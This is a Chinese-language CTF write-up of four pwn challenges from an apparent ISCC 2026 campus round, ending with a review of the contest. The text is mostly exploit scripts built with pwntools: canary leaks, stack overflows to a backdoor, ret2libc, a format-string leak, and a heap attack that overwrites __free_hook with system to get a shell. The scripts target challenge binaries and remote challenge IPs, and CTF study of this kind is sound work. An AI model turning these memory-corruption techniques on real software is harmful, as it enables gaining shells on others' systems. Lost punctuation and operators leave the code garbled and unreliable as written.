ISCC-pwn（2026）

复现一下文章目录校赛练武pwn1pwn2pwn3pwn4总结校赛练武pwn132位泄露canary后栈溢出到后门即可。frompwnimport*context.terminal[tmux,splitw,-h]context.log_leveldebugpprocess(./attachment-5)#premote(39.96.201.215,10004)rulambdax:p.recvuntil(x)sllambdax:p.sendline(x)slambdax:p.send(x)slalambdax:p.sendlineafter(x)n2blambdax:str(x).encode()snlambdax:sl(n2b(x))defbug():gdb.attach(p);pause()s(ba*0x65)ru(ba*0x64)canaryu32(p.recv(4))-ord(a)pyba*0x64p32(canary)ba*0xcp32(0x80491CF)s(py)p.interactive()pwn2感觉是远程环境问题远程需要爆破libc_base然后cat flag拿到shell本地就正常ret2libc。frompwnimport*#premote(39.96.193.120,10000)eELF(./attachment-9)pprocess(./attachment-9)rulambdax:p.recvuntil(x)sllambdax:p.sendline(x)slambdax:p.send(x)slalambdax:p.sendlineafter(x)n2blambdax:str(x).encode()snlambdax:sl(n2b(x))defbug():gdb.attach(p);pause()libcELF(./libc.so.6)ru(bHope you have a good time here.\n)#s(bDDDDb.%x*15)pyfmtstr_payload(4,{0x804C030:5})s(py)py1ba*0x94p32(e.plt.puts)p32(0x080490B0)p32(e.got.puts)s(py1)ru(bInput:\n)libc_baseu64(p.recv(4).ljust(8,b\x00))-libc.sym.putsprint(hex(libc_base))s(b)s(ba*0x94flat(libc_baselibc.sym.system,0,libc_basenext(libc.search(b/bin/sh))))p.interactive()pwn3格式化字符串泄露canary和libc打ret2libc。frompwnimport*context.terminal[tmux,splitw,-h]#context.log_level debugcontext.archamd64file./pwn#pprocess(file)premote(39.96.193.120,33334)eELF(file)libcELF(./libc6_2.31-0ubuntu9.16_amd64.so)rulambdax:p.recvuntil(x)sllambdax:p.sendline(x)slambdax:p.send(x)slalambdax:p.sendlineafter(x)n2blambdax:str(x).encode()snlambdax:sl(n2b(x))defbug():gdb.attach(p);pause()defexp():s(f%10$s%{0x276}$p.encode().ljust(0x10,b\x00)p64(e.got.read))#bug()ru(bWelcome, )libc_baseu64(p.recv(6).ljust(8,b\x00))-libc.sym.readprint(hex(libc_base))ru(b0x)canaryint(p.recv(16),16)systemlibc.sym[system]libc_base shnext(libc.search(b/bin/sh))libc_base off0x00000000004014a3rdioff retoff1sn(0xf00)pyba*0x108p64(canary)ba*8flat(rdi,sh,ret,system)s(py)exp()p.interactive()pwn4代码比较长耐心re找到漏洞点就比较ez了。保护全开。glibc2.31没开沙箱大概率是覆盖free_hook为system了。程序分两部分一个teacher一个student开始代码审计。增加学生有个数据结构两个chunk分别为manage_chunk和qustion_chunk。可以edit qustion的number。这里的fd!0向外读student_score范围为0~89。add和edit comment_chunk且大小可以一定的控制这里也是个数据结构。free manage_chunkqustion_chunk和comment_chunk。无uaf漏洞。转变身份。再看student这边。else中第一个if可以知道manage_chunk的addr即可以泄露heap_base第二个if可以泄露comment_chunk中的内容即可以泄露libc_base。改lazy的last_byte。第一个if中add_mode和edit_mode第二个if可以改mode_chunk的last_byte结合第一个if还有edit_lazy可以做到任意地址写入。choose student。先看看数据结构吧思路很清晰了我们可以结合任意地址写入改mode_chunk为question_chunk覆盖comment为free_hook然后edit_comment为system即可shell。那么我们就需要获得libc_base我们先add_comment的大小大于0x80由于最多只能分配7个manage_chunk和question_chunk那么我们先改tcache struct中chunk的size位改大才能一次性free0x80的chunk到unsorted bin。那么我们就需要知道heap想知道heap_base就需要score90那么我们先用任意地址写改mode为question在score处写入90即可然后就可以泄露heap了之后再用任意地址写改mode为question覆盖comment指针为heap_base0x1e再往里面写入一个很大的数即可。然后free掉comment_chunk就可以进入unsorted bin了。后面老方法改mode为question改comment指针为free掉的comment指针就可以泄露libc了。给一个tcache chunk[size]位置的计算公式(malloc(size-0x10))counts[idx] 按 2 字节处理(size - 0x20) / 0x10 n 0x10 n* 2 偏移frompwnimport*context.terminal[tmux,splitw,-h]context.log_leveldebugcontext.archamd64file./pwnpprocess(file)#premote(39.96.193.120,10008)eELF(file)libcELF(./libc-2.31.so)rulambdax:p.recvuntil(x)sllambdax:p.sendline(x)slambdax:p.send(x)slalambdax,y:p.sendlineafter(x,y)n2blambdax:str(x).encode()snlambdax:sl(n2b(x))defbug():gdb.attach(p);pause()defto_cmd(idx):ru(brole: 0.teacher/1.student: )sn(idx)defto_tea():to_cmd(0)defto_stu():to_cmd(1)defcmd(idx):ru(bchoice )sn(idx)defadd_stu():cmd(1)ru(benter the number of questions: )sn(9)defadd_comment(idx,size,content):cmd(3)ru(bwhich one? )sn(idx)ru(bplease input the size of comment: )sn(size)ru(benter your comment:)s(content)defedit_comment(idx,content):cmd(3)ru(bwhich one? )sn(idx)ru(benter your comment:)s(content)deffree(idx):cmd(4)ru(bwhich student id to choose?)sn(idx)defchange():cmd(5)defadd_mode(mode):cmd(4)ru(benter your mode!)s(mode)defedit_mode(mode):cmd(4)sla(benter your pray score: 0 to 100\n,str(mode).encode())defshow_manage():cmd(2)defshow_comment():cmd(2)defchoose_stu(idx):cmd(6)ru(binput your id: )sn(idx)defedit_addr(addr_last_byte,content):choose_stu(0)cmd(3)edit_mode(addr_last_byte)cmd(3)add_mode(content)#先分配7个manage_chunkto_tea()foriinrange(7):add_stu()change();to_stu()#bug()foriin(0,1,2):choose_stu(i)add_mode(ba)#bug()#leak_heapedit_addr(0x10,p32(9)p32(90))choose_stu(4)show_manage()ru(b0x)heapint(p.recvuntil(b\n,dropTrue),16)-0x3e0print(hex(heap))s(n2b(heap))#leak_libcchange();to_tea()add_comment(6,0x80,ba)add_comment(0,0x10,ba)change();to_stu()edit_addr(0x10,p32(9)p32(1)p64(heap0x1e)p32(2))change();to_tea()edit_comment(4,p16(0x100))free(6)change();to_stu()edit_addr(0x60,p32(9)p32(1)p64(heap0x560)p32(8))choose_stu(5)show_comment()ru(bhere is the review:\n)libc_baseu64(p.recv(6).ljust(8,b\x00))-libc.sym.__malloc_hook-0x10-96print(hex(libc_base))#bug()#改free_hook为systemfree_hooklibc_baselibc.sym.__free_hook systemlibc_baselibc.sym.system edit_addr(0x10,p32(9)p32(1)p64(free_hook-8)p32(16))change();to_tea()edit_comment(4,b/bin/sh\x00p64(system))free(4)p.interactive()总结比赛水的不想评价只评价题目。校赛练武题第一天上的两个pwn题个人觉得栈题过于简单就是一个签到题水平到了堆题代码审计比较吃力题目比较有意思不算特别难。但还是建议提高栈题难度降点堆题代码审计量吧。第二天的两个pwn题全是栈题第一题正常ret2libc应该就可以我滴乖乖远程环境有问题ret后链会炸那没招了爆破libc_base 听了就666第二题附件和远程环境对不上远程环境还炸了6666修好后1分钟1000解666会盲打的人挺多的啊不愧是iscc吓哭了题目还是可以的建议换到第一天的pwn题。